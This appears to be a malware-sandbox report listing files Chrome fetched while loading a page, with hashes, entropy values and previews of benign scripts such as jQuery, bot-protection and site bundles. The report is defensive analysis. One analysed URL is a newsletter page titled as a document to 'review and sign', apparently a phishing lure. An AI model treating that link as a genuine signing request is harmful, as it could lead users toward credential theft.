                                                                                                                                            Preview:..........uS..0.....J0x|w.....@.(q.*......;.ZU.....3W.j._...0.5....P........Z..yI..$......K...r.....f.....[.....u....x....:..r.._.....5...d..pM.f.2.|s9?..p.iP.sRi.-(.V.V...2..t.i.....`.$.X H...!(...W..[.. .<aJ*@..#.i....h.Z....!'2;Rm..0.`..W.FF..O.......'&....B.oi..:....T...'..j$p..Oo'bc.,......8z$...E...N..X......F..E.b+Hnb*B.k...<.3?O..'...<a....R..G.....8%...%q.,M.S...TT...|....F.D.(.RS.F)PF..t...C.w.].a...th.m1...f....|f.*.9%....C86...*..C.....,.4...}..0....s3..i..l.C......li.!..W......9\..&.x.......u....
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):548
                                                                                                                                            Entropy (8bit):4.660801881684815
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:TvgsoCVIogs01lI5r8INGlTF5TF5TF5TF5TF5TFK:cEQtnDTPTPTPTPTPTc
                                                                                                                                            MD5:4B074B0B59693FA9F94FB71B175FB187
                                                                                                                                            SHA1:0004D4F82B546013424B2E0DE084395071EEF98B
                                                                                                                                            SHA-256:25FB23868EBF48348F9E438E00CB9B9D9B3A054F32482A781C762CC4F9CC6393
                                                                                                                                            SHA-512:F928E9FAA0BC776FC5D8A0326981853709D437B7B1C2E238894BFB2ACBB627442C425CBB00D369C52D15876B6C795E67F7580341686696D569A908A6ADD4B444
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:<html>..<head><title>403 Forbidden</title></head>..<body>..<center><h1>403 Forbidden</h1></center>..<hr><center>nginx</center>..</body>..</html>.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->..
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text, with very long lines (2478)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):2836
                                                                                                                                            Entropy (8bit):5.196141779380909
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:JWkEUNHBAge31serkXLZ6eT/E3TLXJZJYT+QQGLeYXNsRb+3L:QQiHlkXL4eT/wTLXJ/O+QQIeYXrL
                                                                                                                                            MD5:37E74A5D6999D254BCB2D902CB7F7574
                                                                                                                                            SHA1:F09BB368BD49AD63A9C6B92FD3EE8A62CCF881F4
                                                                                                                                            SHA-256:3155DFD500FC5FE24009BE5EC55EA2AD2CBBFADF26FC54AC380E2CE1E1D44CA3
                                                                                                                                            SHA-512:CCBFBD51EEF44B579FF19803441FD6CF955971DFEA2DCCAB9DAF51D2BAA8C4DC155CA61F77AB3B22FA84FC920D4E5948C409654200ED435CE8079B82E61B1C2F
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://kanes-newsletter-871ead.beehiiv.com/assets/index-CJHGmWl4.js
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="018dbf1d-1d14-5469-8ce6-ecef90fdbe8e")}catch(e){}}();.import{j as s}from"./jsx-runtime-BjG_zV1W.js";import{c as h}from"./index-x2da_zcv.js";const g=n=>n?n.toLowerCase().split(" ").join("-"):"",j={ariel:"font-ariel",bitter:"font-bitter",courier:"font-courier",didot:"font-didot",garamond:"font-garamond",georgia:"font-georgia",helvetica:"font-helvetica",lora:"font-lora","lucida-console":"font-lucida-console",merriweather:"font-merriweather",monaco:"font-monaco",montserrat:"font-montserrat","open-sans":"font-open_sans",palatino:"font-palatino","playfair-display":"font-playfair-display",poppins:"font-poppins",roboto:"font-roboto","times-new-roman":"font-times-new-roman","trebuchet-ms":"font-trebuchet-ms",verdana:"font-verdana"},C=({as:n="p",children:o,size:a="md",weight:r="regular",cl
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (65402)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):154762
                                                                                                                                            Entropy (8bit):5.668960014350257
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:udEPwpylafJVim3cBdB9O4QW5ClX97hufBNhTHdJHNdm5oa:udEhlafWm3cdhClNKPzd1Ndmx
                                                                                                                                            MD5:03224CA324C68481225C2EC46CFA8657
                                                                                                                                            SHA1:974C884B1F194F8938C8BA141326438FE5206DDB
                                                                                                                                            SHA-256:DED3124D519A7CBCBB81ECF042C9E3CF398DEF2C1550287BBAF91C63806873A6
                                                                                                                                            SHA-512:9E93751690253D92737B4E253E19226C14D1F86CCB38CE2A1FC3C8AC990ACD36890948D97843EE2281F6385E18C4EC72452945C64C8037472FE7CBE6CE0D50DD
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://client.hsprotect.net/PXzC5j78di/main.min.js
                                                                                                                                            Preview:// @license Copyright (C) 2014-2025 PerimeterX, Inc (www.perimeterx.com). Content of this file can not be copied and/or distributed..try{window._pxAppId="PXzC5j78di",function(){"use strict";function t(e){return t="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(t){return typeof t}:function(t){return t&&"function"==typeof Symbol&&t.constructor===Symbol&&t!==Symbol.prototype?"symbol":typeof t},t(e)}function e(t,e){(null==e||e>t.length)&&(e=t.length);for(var n=0,r=new Array(e);n<e;n++)r[n]=t[n];return r}function n(t,n){if(t){if("string"==typeof t)return e(t,n);var r=Object.prototype.toString.call(t).slice(8,-1);return"Object"===r&&t.constructor&&(r=t.constructor.name),"Map"===r||"Set"===r?Array.from(t):"Arguments"===r||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(r)?e(t,n):void 0}}function r(t){return function(t){if(Array.isArray(t))return e(t)}(t)||function(t){if("undefined"!=typeof Symbol&&null!=t[Symbol.iterator]||null!=t["@@iterator"])return Array.from(t)}(t)||
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1435
                                                                                                                                            Entropy (8bit):7.8613342322590265
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
                                                                                                                                            MD5:9F368BC4580FED907775F31C6B26D6CF
                                                                                                                                            SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                                                                                                                            SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                                                                                                                            SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 406986
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):116345
                                                                                                                                            Entropy (8bit):7.997378915283506
                                                                                                                                            Encrypted:true
                                                                                                                                            SSDEEP:3072:svJ27JKT4KNXDBEeFUNHE/7SVxX7RLTMMqfC4:L7KPDBEeF2HE+J5AMqfC4
                                                                                                                                            MD5:7570EB58C2BCE45B24EA431EB15D27B5
                                                                                                                                            SHA1:0DE0A6616E6BF7B045CFC456E4E3DF6760617CFA
                                                                                                                                            SHA-256:5AEE6747482DFC52A669CAED6BE1B9319536AC9514C2D7354B879F093ABB212A
                                                                                                                                            SHA-512:696D4C3765DA2936461D15C89A41F98EDED30F202C422143D921D6096D7DD6456479F48B1065398323F7DFE60B5D3452B0C3C67DD01EE041E51CFBCA9125D86D
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:...........k{.H.(.}............'qz<..>.3==..G..(..../m..]kU.T......|x....T.Z...O....T.........e..]../'.o+gp.k.........F....+#..+.{..|X..J.U.`.F.0...W..7.Ie...J2.Y.~.$.L.8....$...P]4..yQ.P99..P?....?........I%....+^0..&p..2..<........Da...J....F.9<.7.*^.+1O*.0J..........h1....[....h..............u".....C%.+..\.>....T`.1....... i......8.TB(.Uh.b.{...@<y..D^.S.....n".<H.L..O..*.t........p6..\[...yCm.J.k.....b..vg....-.j.$........1....p~3.b.....n....[_c..{1WN.l~.=...........?......S.}U..g.......t..../...........|.+...-y.X\...l.....>;."....ye.\.....h..p.f.8...[/..nd.,..O.b>.6-......c7.}.yp.c5.R6p..E...z3.......y7.d.M..K...n.h...OX.&..d.[/...ng.S.Ae..D<.GAe..&.^7......'..b...#..X..q....O.~W.M3.+b..m.>&^t.O..I.LU.;..a....&.k.$...{.{.^.....3OX.Oy8O...f.%..o..]..9....Ln-...'.....A.3y..v=l....G......i..../...--k...p..m..Y........XV...i.......;.o..zyc@..MLoy.b_.,.....5..w=..#.^..M.P.'<_.j...m..|......0...w../...>\...l.>.....h...q>.w...ZM[...
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:JSON data
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):15619
                                                                                                                                            Entropy (8bit):5.127062244601769
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:sQIljUmiGdmzVJVrNY86Q6w6OM26zzVJewQ:sQuRmzVPi86Q6TzVvQ
                                                                                                                                            MD5:2CA593691E4CEEE8F8F8CA85EC2F1C5D
                                                                                                                                            SHA1:55FFF598B34FF7E48F11C3411A052CFBF5EE96A7
                                                                                                                                            SHA-256:794EACC9478654740035BACCC907A401BB1C19CB1CA16600F5F6506FAD85A476
                                                                                                                                            SHA-512:E41E47C42697D8BC33F6AD314B5F1B67AAF5709093E346D9242590FC26BF5273BDED4BB52B3150EDCB2A4829AA34BF9DD5403D10EAD0B111332566C0B7271AEF
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-below?_data=root
                                                                                                                                            Preview:{"canShowCookieBanner":true,"publication":{"id":"e9a24ece-1662-40a3-bd96-eb16d3703de3","name":"Kane's Newsletter","description":null,"tags":[],"url":"https://kanes-newsletter-871ead.beehiiv.com/","web_theme":{"primary_color":"#030712","text_on_primary_color":"#F9FAFB","secondary_color":"#F9FAFB","text_on_secondary_color":"#030712","tertiary_color":"#FFFFFF","text_on_tertiary_color":"#222222","background_color":"#FFFFFF","text_on_background_color":"#030712","subscribe_background_color":"#FFFFFF","text_on_subscribe_background_color":"#030712","subscribe_theme":"light","content_theme":"light","border_style":"round","border_radius":"8px","border_color":"#E5E7EB","header_font":"Inter","body_font":"Inter","button_font":"Inter","logo_shadow":"md","name":null,"purpose":"web","owner_id":"e9a24ece-1662-40a3-bd96-eb16d3703de3"},"cta_text":"Subscribe","copyright_text":null,"noindex_enabled":false,"double_opt_required":false,"premium_enabled":false,"premium_offering_name":"Premium Membership","prem
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):531
                                                                                                                                            Entropy (8bit):5.448064499073803
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:UgDGH4LOaOvCaBfuS9gVNwMMsC9u4fmKBpsY:UgqHHVvCaRuSKVN5MsC9ucBBqY
                                                                                                                                            MD5:324C6AAA68A98C32851E33323BBC727F
                                                                                                                                            SHA1:73DEBC3F0A34DE291151DA17FE4D73A1E43CD748
                                                                                                                                            SHA-256:710880B72E821908482D8D40EED4822AE189D7175CA428ECF0DFBC2E819633B6
                                                                                                                                            SHA-512:24760A7321BA774D6FBA8D751678F9A81955D2844547BDAE04E7A371AEA149FF051E310EC3AD771AC3AFFEC57A9CA0559342119A65E6862A178FCA04450D7986
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://kanes-newsletter-871ead.beehiiv.com/assets/index-DcpNk-OI.js
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="5aa4b958-6306-582a-a4ee-9fa8cff5f593")}catch(e){}}();.const o=e=>{if(!e)return"";const n=e.replace(/-/g,"~").replace(/ /g,"-");return typeof window>"u"||!window.encodeURIComponent?n:window.encodeURIComponent(n)};export{o as g};.//# sourceMappingURL=index-DcpNk-OI.js.map..//# debugId=5aa4b958-6306-582a-a4ee-9fa8cff5f593.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (65447)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):89501
                                                                                                                                            Entropy (8bit):5.289893677458563
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                                                                            MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                                                            SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                                                            SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                                                            SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):364
                                                                                                                                            Entropy (8bit):5.492500134735472
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:W5V/pADGH4LvGaDzGvdAZE2MEuuo7wW6wewSYpURc4NNw1QWtJEPfacpn:UgDGH4LOaOvCaBfuShURjNwjifam
                                                                                                                                            MD5:222F131061CB0EAA746C7FBD54BFDC1D
                                                                                                                                            SHA1:5D8BD1353A1FB951D94BC31B462F36FAF89FA91D
                                                                                                                                            SHA-256:834BB85855936BFF620857F8901ED2E82805F2CEEC001ADE8234570013509D6D
                                                                                                                                            SHA-512:2F9ECF97443EEA89FE25938B6B37C79C66346BF6331C088FCA164092EABA37D6380AE9D4F0761E316C6127B3BC5E900E64BE674541DC6A6C7AFCADF0E66AB08E
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="dea111b5-62d1-501e-9de6-137635cc7767")}catch(e){}}();..//# sourceMappingURL=visit_token-l0sNRNKZ.js.map..//# debugId=dea111b5-62d1-501e-9de6-137635cc7767.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text, with very long lines (3486)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3850
                                                                                                                                            Entropy (8bit):5.20886063483284
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:JWkEyNHdAuiBI+0t+e2n26e7c5QrhmkFyuvK9sajqRRBspZCRBwCb8PH6K80uMC:QSGu5we2npehhTvK9IRRBspZ8wCYPI5n
                                                                                                                                            MD5:FBBF9D5AB1828027B77A0ED443670074
                                                                                                                                            SHA1:3A70F68898380AED561F007B83D47A4FFD087BD1
                                                                                                                                            SHA-256:F5FC9FC22259D24F00ADDD54FB79F2214DA4E9B9B9842E3C5DA1C1256C8FD8EF
                                                                                                                                            SHA-512:D1D29FC625BA9625B325E852C108020B6AED7684B4DAF19C75F4409B648A190483FE9D961D81C771FA2AEE732D15056074A2695963368EBC061F0A4B08BE6F74
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="51ff9e43-d9cc-508d-8e8e-c64b9dda2bd2")}catch(e){}}();.import{j as s}from"./jsx-runtime-BjG_zV1W.js";import{c as t}from"./index-x2da_zcv.js";const r=({className:e,fill:c})=>s.jsx("svg",{className:t(e),xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24",fill:c,children:s.jsx("path",{d:"M24 12.073c0-6.627-5.373-12-12-12s-12 5.373-12 12c0 5.99 4.388 10.954 10.125 11.854v-8.385H7.078v-3.47h3.047V9.43c0-3.007 1.792-4.669 4.533-4.669 1.312 0 2.686.235 2.686.235v2.953H15.83c-1.491 0-1.956.925-1.956 1.874v2.25h3.328l-.532 3.47h-2.796v8.385C19.612 23.027 24 18.062 24 12.073z"})}),i=({className:e,fill:c})=>s.jsx("svg",{className:t(e),xmlns:"http://www.w3.org/2000/svg",width:"24",height:"24",viewBox:"0 0 24 24",fill:c,children:s.jsx("path",{d:"M12 2.163c3.204 0 3.584.012 4.85.07 3.252.148
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (52847)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):101490
                                                                                                                                            Entropy (8bit):5.468371780725999
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:X6e1Wj6E1t9lLZjnrIZ7NLinbKTYMyT7/6arB0swdlPYVbG:nML9lhS0WsMyT76lPYVK
                                                                                                                                            MD5:11CC474B3A5DAC030EB4F0403AE74209
                                                                                                                                            SHA1:19FA7AE01454399F2C1D7BB7C39C131F8687410A
                                                                                                                                            SHA-256:1C9F82BCDEDB470601EECE73E7C2AA135BD6BAA958F5456C4C7758FC393C5095
                                                                                                                                            SHA-512:144F2D6815DA4F97ACF50D54D9A176D3D6391F05D36B183FCE88E7DB4A5D831C3E4A9DCE5C06267251A3FF095A2839CCE54CD07EFC94073598BF12EDD0C6C227
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://kanes-newsletter-871ead.beehiiv.com/assets/root-C5Mn_uH-.js
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="45243a5f-3b91-5121-b1a7-aa2791e29d8d")}catch(e){}}();.import{j as e}from"./jsx-runtime-BjG_zV1W.js";import{a as q,v as st,r as i,e as at,u as nt,O as rt,K as ot,J as Le}from"./index-D6da9p6-.js";import{_ as F,n as ne,I as it}from"./index-CqJN8iQq.js";import{c as T}from"./index-x2da_zcv.js";import{g as _e,aO as lt,c as ct}from"./AppGlobals-2Br-8bZs.js";import{C as be,u as dt}from"./index-DTtuIjz-.js";import{u as N}from"./useTranslation-CfKJAmGY.js";import{g as mt,w as ut,_ as ht,u as I,M as xt,x as ft,S as pt,L as S,d as me,f as Oe,F as Be,c as gt,b as vt}from"./components-Oj2xMfGE.js";import{F as V}from"./index-DWIcfCyK.js";import{B as A}from"./index-BxYGUTX4.js";import{T as y}from"./index-CJHGmWl4.js";import{u as E,S as Me,W as wt}from"./WebThemeContext-DttfuZxo.js";import{P as
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text, with very long lines (1465)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1830
                                                                                                                                            Entropy (8bit):5.45957708866139
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:JWkEUuNvVmZSPXkVn719ndh8kH0ynVvfHPngBsmMOca53cJ:QMsVm0PU9197jH0ynhvgLyJ
                                                                                                                                            MD5:7A2375960B4DCBF4F214C99F81173369
                                                                                                                                            SHA1:EE2B4429330C400C90D95C4E1EB6473168F5F921
                                                                                                                                            SHA-256:34EBE5A84FF32DFE681819C8DF6E4C38DA65FB799543BA6CA7104737853BAB78
                                                                                                                                            SHA-512:DACB85E86D2A4B575FD3D3344D2AF9C66D9546F3AF05595B79E6A746B569BB48D83F563534183FC23708888EAE4D56361D36180DA181E8A26C8EA3EEE88DA90F
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="2842b501-6f6d-5180-bc66-feb3a70b1d2e")}catch(e){}}();.import{r as e}from"./index-D6da9p6-.js";import{j as t}from"./jsx-runtime-BjG_zV1W.js";import{c as a}from"./index-x2da_zcv.js";function c({title:r,titleId:o,...n},s){return e.createElement("svg",Object.assign({xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24",strokeWidth:1.5,stroke:"currentColor","aria-hidden":"true","data-slot":"icon",ref:s,"aria-labelledby":o},n),r?e.createElement("title",{id:o},r):null,e.createElement("path",{strokeLinecap:"round",strokeLinejoin:"round",d:"M21 8.25c0-2.485-2.099-4.5-4.688-4.5-1.935 0-3.597 1.126-4.312 2.733-.715-1.607-2.377-2.733-4.313-2.733C5.1 3.75 3 5.765 3 8.25c0 7.22 9 12 9 12s9-4.78 9-12Z"}))}const d=e.forwardRef(c),w=({className:r})=>t.jsx("svg",{xmlns:"http://www.w3.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text, with very long lines (3329)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3697
                                                                                                                                            Entropy (8bit):5.093372328942918
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:QwdT2aF4CEZAiiK2YSBasZBtDWK14N4eZj3v:zT7nEZ8/tD5yNLZr
                                                                                                                                            MD5:AE94431438551F0411BCE6FB6BD6B3D2
                                                                                                                                            SHA1:1407A6D6AF0FE3A379F8BF55B2FC09E8ABD399D7
                                                                                                                                            SHA-256:D71079235BA474E147650A4F63B709495307A99A78E9C431A6C25EAC97767352
                                                                                                                                            SHA-512:9FDAA2CEA0B73291DEF6A5B8872D80C294E2F5B841FA9FC669F7130785CD199E4F4F63DF0750436F7A913EBB7D806DC89ECA0F367D65F0027013C60D2821E5DC
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="35752e2a-081f-5d35-833c-fdc527e12edb")}catch(e){}}();.import{j as n}from"./jsx-runtime-BjG_zV1W.js";import{r}from"./index-D6da9p6-.js";const O={0:"opacity-0",10:"opacity-10",20:"opacity-20",30:"opacity-30",40:"opacity-40",50:"opacity-50",60:"opacity-60",70:"opacity-70",80:"opacity-80",90:"opacity-90",100:"opacity-100"},f={none:"p-0",sm:"p-4 sm:px-8 sm:py-8",md:"p-4 sm:px-16 sm:py-12",lg:"p-4 sm:px-24 sm:py-16"},d={none:"shadow-none",xs:"shadow-xs",sm:"shadow-sm",md:"shadow-md",lg:"shadow-lg",xl:"shadow-xl"},b={none:"rounded-none",xs:"rounded-xs",sm:"rounded-sm",md:"rounded-md",lg:"rounded-lg",xl:"rounded-xl","2xl":"rounded-2xl","3xl":"rounded-3xl"},l={xs:"border",sm:"border-2",md:"border-4",lg:"border-8"},c={xs:"border-t",sm:"border-t-2",md:"border-t-4",lg:"border-t-8"},i={xs:"bo
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:HTML document, ASCII text, with very long lines (3450), with CRLF line terminators
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):3452
                                                                                                                                            Entropy (8bit):5.117912766689607
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:3qO9I9Sz9KHULI5m4UidBGLosqAsosushswsosry:a2IYz95qTdBac
                                                                                                                                            MD5:CB06E9A552B197D5C0EA600B431A3407
                                                                                                                                            SHA1:04E167433F2F1038C78F387F8A166BB6542C2008
                                                                                                                                            SHA-256:1F4EDBD2416E15BD82E61BA1A8E5558D44C4E914536B1B07712181BF57934021
                                                                                                                                            SHA-512:1B4A3919E442EE4D2F30AE29B1C70DF7274E5428BCB6B3EDD84DCB92D60A0D6BDD9FA6D9DDE8EAB341FF4C12DE00A50858BF1FC5B6135B71E9E177F5A9ED34B9
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://login.live.com/Me.htm?v=3
                                                                                                                                            Preview:<script type="text/javascript">!function(t,e){for(var s in e)t[s]=e[s]}(this,function(t){function e(n){if(s[n])return s[n].exports;var i=s[n]={exports:{},id:n,loaded:!1};return t[n].call(i.exports,i,i.exports,e),i.loaded=!0,i.exports}var s={};return e.m=t,e.c=s,e.p="",e(0)}([function(t,e){function s(t){for(var e=f[S],s=0,n=e.length;s<n;++s)if(e[s]===t)return!0;return!1}function n(t){if(!t)return null;for(var e=t+"=",s=document.cookie.split(";"),n=0,i=s.length;n<i;n++){var a=s[n].replace(/^\s*(\w+)\s*=\s*/,"$1=").replace(/(\s+$)/,"");if(0===a.indexOf(e))return a.substring(e.length)}return null}function i(t,e,s){if(t)for(var n=t.split(":"),i=null,a=0,r=n.length;a<r;++a){var c=null,S=n[a].split("$");if(0===a&&(i=parseInt(S.shift()),!i))return;var l=S.length;if(l>=1){var p=o(i,S[0]);if(!p||s[p])continue;c={signInName:p,idp:"msa",isSignedIn:!0}}if(l>=3&&(c.firstName=o(i,S[1]),c.lastName=o(i,S[2])),l>=4){var f=S[3],d=f.split("|");c.otherHashedAliases=d}if(l>=5){var h=parseInt(S[4],16);h&&(c.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):76
                                                                                                                                            Entropy (8bit):4.5425757840672105
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:xPU0CnruioSMQrnWWV0znYn:xPU7nZPlnW60rY
                                                                                                                                            MD5:CED1FC1ADE13B8771856BD3D1E64021C
